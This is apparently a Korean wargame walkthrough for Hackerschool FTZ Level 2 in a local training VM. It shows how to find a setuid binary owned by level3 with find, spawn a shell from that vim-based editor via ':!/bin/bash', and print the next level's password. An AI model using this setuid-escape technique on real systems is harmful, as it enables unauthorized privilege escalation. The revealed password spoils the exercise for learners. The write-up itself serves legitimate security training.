F.T.Z Level2 문제풀이

F.T.Z Level2 문제풀이

먼저 리눅스를 접해보지 않으신분들에겐 다소 명령어가 생소하실겁니다.

실습환경 : VMware Red Hat 9.0 (해커스쿨 F.T.Z 로컬 VM이미지)

한글 Putty 0.60 

다운로드 : http://gmyankee.tistory.com/42

login as : level2

password : hacker or cracker

ls 명령으로 디렉터리 목록을 확인해보도록 합시다.

[level2@ftz level2]$ ls

hint    public_html    tmp

지난번 level1 때와 같은 파일들이네요 내용은 다르겠지만요.

hint파일을 cat 명령으로 열어봅시다.

[level2@ftz level2]$ cat hint

텍스트 파일 편집 중 쉘의 명령을 실행시킬 수 있다는데...

이건.. 리눅스 공부하실때 vi 열심히 공부하셨으면 기억하실거라고 생각합니다.

일단 level3 의 SetUID 권한을 가지고있는 파일을 찾아보기 위해 find 명령을 사용해봅시다.

[level2@ftz level2]$ find / -user level3 -perm -4300 2>/dev/null

/usr/bin/editor

[level2@ftz level2]$ cd /usr/bin

[level2@ftz level2]$ ./editor

실행하면 

위와 같은 vim 버전의 메인 페이지가 나타납니다.

쉘 명령을 사용하기 위해서

:!/bin/bash

를 입력합니다.

!/bin/bash는 텍스트 파일 편집중 터미널의 기능을 사용하려고 나가는 것이며 Ctrl + D 를 누르거나

exit를 입력시 다시 텍스트편집기상태로 돌아갑니다.

그럼 지난번과 마찬가지로 level3 유저로 변경된것을 보실수 있으며

해당 쉘 상태에서 my-pass를 입력하면

Level3 Password is "can you fly?".